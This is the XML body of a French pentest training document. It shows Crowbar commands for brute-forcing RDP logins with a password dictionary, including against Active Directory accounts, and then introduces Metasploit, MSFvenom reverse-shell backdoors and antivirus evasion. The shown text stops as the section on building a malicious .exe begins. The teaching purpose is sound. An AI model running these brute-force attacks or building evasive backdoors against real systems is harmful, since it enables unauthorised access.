        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="9" w:name="_Toc121847805"/>
      <w:r/>
      <w:bookmarkStart w:id="10" w:name="_Toc123116327"/>
      <w:r>
        <w:t xml:space="preserve">Installation de Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r/>
      <w:bookmarkEnd w:id="10"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Avant de commencer, pour pouvoir télécharger la dernière version de kali, rdv sur le site :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:hyperlink r:id="rId17" w:tooltip="https://www.techspot.com/downloads/6738-kali-linux.html" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.techspot.com/downloads/6738-kali-linux.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5373361" cy="2394019"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="2540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stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5387307" cy="2400232"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="4F81BD"/>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23.1pt;height:188.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" strokecolor="#4F81BD">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId18" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>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pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="11" w:name="_Toc121847806"/>
      <w:r/>
      <w:bookmarkStart w:id="12" w:name="_Toc123116328"/>
      <w:r>
        <w:t xml:space="preserve">Premiers pas avec Crowbar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r/>
      <w:bookmarkEnd w:id="12"/>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Une fois notre kali installé et que notre address IP est en statique, nous allons mettre à jours les paquets :</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apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> update</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apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> upgrade</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Ensuite nous allons procéder à la mise en place de crowbar :</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apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-get install crowbar</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Ensuite nous allons utiliser une méthode assez basique et qui ne ressemble pas à une attaque par brute force : une seule tentative, avec un utilisateur et un mot de passe spécifique. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ainsi, si l'on veut cibler l'adresse IP "192.168.240.140" en spécifiant l'utilisateur "yann" et le mot de passe "Benhamron1,", on va devoir utiliser :</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192.168.240.240/32 -u yann -c Benhamron1,</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">L'option "-b" sert à préciser le service à cibler, donc pour du "Bureau à distance", on précise "RDP". </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cette option accepte d'autres valeurs : </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Openvpn</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sshkey</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vnckey</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lorsque la commande retourne "No results found" cela signifie que l'identifiant et le mot de passe n'ont pas fonctionné.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1791" w:leader="none"/>
        </w:tabs>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4810125" cy="1133475"/>
                <wp:effectExtent l="0" t="0" r="9525" b="952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tretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4810125" cy="11334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78.8pt;height:89.2pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId19" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Nous pouvons aussi cibler plusieurs adresses IP, et pour cela il y a plusieurs choix :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Séparer les adresses IP par une virgule</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Préciser un sous-réseau (par exemple 192.168.100.0/24) plutôt qu'une machine mais précisez aussi le timeout (-t) pour que ce ne soit pas trop long</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Utiliser un fichier avec une liste d'adresses IP via l'option –S</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192.168.240.10/32,192.168.240.11/32 -u yann -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Benhamron</w:t>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Dans le cas où le serveur est accessible en RDP sur un port différent du port par défaut (3389), on peut préciser un port via l'option "-p". Par exemple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192.168.240.240/32 -u yann -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Benhamron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 13389</w:t>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r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="13" w:name="_Toc121847807"/>
      <w:r/>
      <w:bookmarkStart w:id="14" w:name="_Toc123116329"/>
      <w:r>
        <w:t xml:space="preserve">Utiliser des listes et dictionnaires avec Crowbar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r/>
      <w:bookmarkEnd w:id="14"/>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Si l'on veut simuler une véritable attaque par brute force, il convient d'utiliser un dictionnaire. Soit vous constituez vous-même un dictionnaire, soit vous recherchez une base existante sur Internet, comme par exemple rockyou.tkt, sur GitHub :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId20" w:tooltip="https://www.google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=&amp;ved=2ahUKEwi84-KMh_f7AhU8TaQEHffnBY0QFnoECA4QAQ&amp;url=https%3A%2F%2Fgithub.com%2Fbrannondorsey%2Fnaive-hashcat%2Freleases%2Fdownload%2Fdata%2Frockyou.txt&amp;usg=AOvVaw3snAERl1mU6Ccr4WFEazBd" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=&amp;ved=2ahUKEwi84-KMh_f7AhU8TaQEHffnBY0QFnoECA4QAQ&amp;url=https%3A%2F%2Fgithub.com%2Fbrannondorsey%2Fnaive-hashcat%2Freleases%2Fdownload%2Fdata%2Frockyou.txt&amp;usg=AOvVaw3snAERl1mU6Ccr4WFEazBd</w:t>
        </w:r>
      </w:hyperlink>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Nous pouvons créer un petit dictionnaire "dico.txt" en local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nano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/dico.txt</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>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À l'intérieur, on ajoute quelques mots de passe, puis on enregistre :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="cente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3909384" cy="3058543"/>
                <wp:effectExtent l="0" t="0" r="0" b="889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
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3920760" cy="30674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07.8pt;height:240.8pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId21" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Une fois que s’est fait, on repart à l'assaut du serveur en utilisant le dictionnaire (l'option -c est remplacée par -C). Ce qui donne :</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192.168.240.240/32 -u yann -C ~/dico.txt</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Grâce à la commande ci-dessus, on réalise un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e véritable attaque brute force sur le compte "yann". Sachez qu'avec la convention de nommage actuel, on cible un compte local. Si l'on veut cibler un compte du domaine, il faut utiliser l'une des conventions de nommage suivante (domaine Active Directory "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">formation.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" avec le nom NetBIOS "FORMATION")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192.168.240.240/32 -u yann@foration -C ~/dico.txt</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192.168.240.240/32 -u yann@formation.local -C ~/dico.txt</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192.168.240.240/32 -u FORMATION\\yann -C ~/dico.txt</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Vérifions si le mot de passe de yann est bien dans le dictionnaire rockyou.tkt :</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crowbar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -b rdp -s 192.168.240.240/32 -u yann -C ~/dico.txt</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ff0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On le retrouve bien dans le dictionnaire : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Benhamron1, </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5759450" cy="1482090"/>
                <wp:effectExtent l="0" t="0" r="0" b="381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stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="14820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53.5pt;height:116.7pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId22" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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pStyle w:val="1036"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="15" w:name="_Toc123116330"/>
      <w:r>
        <w:t xml:space="preserve">Backdoor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1039"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="16" w:name="_Toc123116331"/>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="17" w:name="_Toc121842985"/>
      <w:r/>
      <w:bookmarkStart w:id="18" w:name="_Toc123116332"/>
      <w:r>
        <w:t xml:space="preserve">Qu’est-ce que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> METASPLOIT ?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r/>
      <w:bookmarkEnd w:id="18"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit est un outil pour le développement et l'exécution d'exploits contre une machine distante, il permet de réaliser des audits en sécurité, de tester et développer ses propres exploits.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes informatiques afin de les protéger, ou par les hackers à des fins de piratage.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="19" w:name="_Toc121842986"/>
      <w:r/>
      <w:bookmarkStart w:id="20" w:name="_Toc123116333"/>
      <w:r>
        <w:t xml:space="preserve">Qu’est-ce qu’un Backdoor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r/>
      <w:bookmarkEnd w:id="20"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un Backdoor ou porte dérobée est utilisée pour contourner les mécanismes de sécurité, souvent secrètement et le plus souvent de manière indétectable. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En utilisant MSFvenom, la combinaison de msfpayload et msfencode, il est possible de créer une porte dérobée qui se reconnecte à l'attaquant en utilisant le reverse Shell TCP. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Afin de développer une porte dérobée, vous devez modifier la signature de votre malware pour échapper à tout logiciel antivirus. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MSFvenom est un générateur de payload autonome faisant partie de la suite Metasploit. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un payload est un fichier malveillant et son but est d’obtenir des informations sur la machine sur laquelle il est exécuté. Il existe beaucoup de types de payload, conçu pour s’adapter à toutes type de machine telle qu’une machine Windows. </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r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1039"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="21" w:name="_Toc121842988"/>
      <w:r/>
      <w:bookmarkStart w:id="22" w:name="_Toc123116334"/>
      <w:r>
        <w:t xml:space="preserve">Procédure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r/>
      <w:bookmarkEnd w:id="22"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="23" w:name="_Toc121842989"/>
      <w:r/>
      <w:bookmarkStart w:id="24" w:name="_Toc123116335"/>
      <w:r>
        <w:t xml:space="preserve">Création d’un .exe malveillant</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r/>
      <w:bookmarkEnd w:id="24"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Avant de commencer, pour pouvoir télécharger la dernière version de kali, rdv sur le site :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:hyperlink r:id="rId23" w:tooltip="https://www.techspot.com/downloads/6738-kali-linux.html" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.techspot.com/downloads/6738-kali-linux.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
